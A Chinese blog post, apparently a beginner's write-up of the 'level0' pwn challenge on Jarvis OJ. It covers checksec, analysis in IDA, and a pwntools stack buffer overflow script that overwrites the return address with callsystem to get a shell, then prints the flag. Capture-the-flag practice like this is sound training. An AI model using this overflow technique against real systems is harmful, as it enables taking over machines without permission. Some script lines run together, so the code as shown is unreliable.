差不多最简单的pwn了吧,不过本菜鸟还是要发出来镇楼
分析一下,checksec 查看程序的各种保护机制
没有金丝雀,没有pie
执行时输出Hello,World,在进行输入,溢出嘛
开工
丢到ida里看看,先看看有价值的strings,除了输出的helloworld 还发现了“/bin/sh”,获取shell的函数都写好啦,是callsystem
继而发现在main函数执行时调用的vulnerable_function()存在不安全的read输入,可以看到buf的长度为0x80+0x8
所以可以通过输入buf,用callsystem的地址覆盖vulnerable_function()的返回地址,进而实现获取shell
程序流程(从ABO偷来下图)
灰色箭头代表覆盖vulnable_function返回地址之前的执行顺序
脚本
#!/usr/bin/env python
# coding:utf-8
# writen by Exm from pwn import *
io = process("./level0")
io = remote("pwn2.jarvisoj.com" , 9881)
elf = ELF("./level0")
func_addr = elf.symbols["callsystem"]
payload = 'a' * (0x80 + 0x8) + p64(func_addr) io.recvline()
io.sendline(payload)
io.interactive()
io.close()
补充一下
symbols是[中括号]!!symbols是[中括号]!!symbols是[中括号]!!
执行一下就getshell啦,拿flag入探囊取物
flag: CTF{713ca3944e92180e0ef03171981dcd41}
作者:辣鸡小谱尼
出处:http://www.cnblogs.com/ZHijack/
如有转载,荣幸之至!请随手标明出处;
